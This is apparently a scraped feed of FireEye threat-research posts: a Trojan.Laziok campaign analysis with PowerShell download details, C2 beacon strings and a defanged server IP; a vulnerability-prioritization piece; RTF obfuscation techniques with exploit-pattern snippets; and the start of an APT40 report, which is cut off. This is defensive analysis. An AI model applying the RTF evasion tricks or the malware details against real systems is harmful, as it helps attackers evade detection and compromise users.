response\n\nOnce decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into \u201dGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<mailto:https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "modified": "2016-04-21T13:45:00", "published": "2016-04-21T13:45:00", "id": "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-11-23T01:38:37", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2019-12650", "CVE-2019-19781"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nOrganizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.\n\nAt FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. \n\nIn this blog post, we\u2019ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.\n\n#### Functions of Vulnerability Intelligence\n\nVulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:\n\n \nFigure 1: Vulnerability intelligence can help with risk assessment and informed decision making\n\n#### Tailoring Vulnerability Prioritization\n\nWe believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.\n\n \nFigure 2: Patch Prioritization Philosophy\n\n#### Integration of Vulnerability Intelligence in Internal Workflows\n\nBased on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.\n\n \nFigure 3: Integration of vulnerability intelligence into internal workflows\n\n**Tools and Use Cases for Operationalizing Vulnerability Intelligence**\n\n_1\\. Automate Processes by Fusing Intelligence with Internal Data_\n\nAutomation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant [Intelligence API](<https://www.fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions/intelligence-api.html>)) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.\n\nSecurity teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that \u2018high\u2019 risk vulnerabilities that have an exploitation rating of \u2018available,\u2019 \u2018confirmed,\u2019 or \u2018wide\u2019 must be patched within a set number of days. Of course, the SLA will depend on the company\u2019s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. \n\nAnother potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization\u2019s unique threat profile and business operations.\n\n_2\\. Communicating with Internal Stakeholders_\n\nTeams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.\n\nData-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization\u2019s appropriate use of resources for security given the potential business impact of security incidents.\n\n_3\\. Threat Modeling_\n\nOrganizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.\n\n#### Examples\n\nThe following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.\n\n_Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization_\n\nThe FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d) tool is available for customers [here](<https://fireeye.market/apps?query=five>). It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.\n\n \nFigure 4: FIVE Tool for Windows and MacOS\n\nIn this scenario, an organization\u2019s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. \n\n \nFigure 5: FIVE tool startup screen waiting for file input\n\n \nFigure 6: FIVE tool after successfully regexing the CVE-IDs from the file\n\nAfter selecting all CVE-IDs, the user clicked the \u201cFetch Vulnerabilities\u201d button, causing the application to make the necessary two-stage API call to the Intelligence API.\n\nThe output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye\u2019s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.\n\n \nFigure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports\n\nFIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization\u2019s vulnerability management program.\n\n_Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling_\n\nCVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and Chinese espionage group, APT41.\n\nIn cases like these, threat intelligence can help impacted organizations find the \u201csignal\u201d in the \u201cnoise\u201d and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This support the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.\n\n_Example 3: Intelligence Reduces Unnecessary Resource Expenditure \u2014 Automating Vulnerability Prioritization and Communications_\n\nAnother common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes help an organization discern when it is necessary to respond in an all-hands-on-deck manner.\n\nTake the case of the [CVE-2019-12650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650>), originally disclosed on Sept. 25, 2019 with an NVD rating of \u201cHigh.\u201d Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, we have experts review the vulnerability and determine that it required the highest level of privileges available to successfully exploit, and there was no evidence of exploitation in the wild.\n\nThis is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as \u201clow\u201d risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.\n\n#### Vulnerabilities: Managed\n\nBecause we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.\n\nMandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps\u2014not just patching\u2014to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n\n**Additional Resources**\n\nZero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One\n\nThink Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two\n\nSeparating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three\n\nMandiant offers [Intelligence Capability Development (ICD) services](<https://www.fireeye.com/solutions/cyber-threat-intelligence.html>) to help organizations optimize their ability to consume, analyze and apply threat intelligence.\n\nThe [FIVE tool is available on the FireEye Market](<https://fireeye.market/apps?query=five>). It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. \n\nMandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.\n", "modified": "2020-04-27T12:30:00", "published": "2020-04-27T12:30:00", "id": "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "href": "https://www.fireeye.com/blog/threat-research/2020/04/enabling-defenders-with-vulnerability-intelligence.html", "type": "fireeye", "title": "Putting the Model to Work: Enabling Defenders With Vulnerability\nIntelligence \u2014 Intelligence for Vulnerability Management, Part Four", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T10:01:23", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately support China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included [victims with connections to 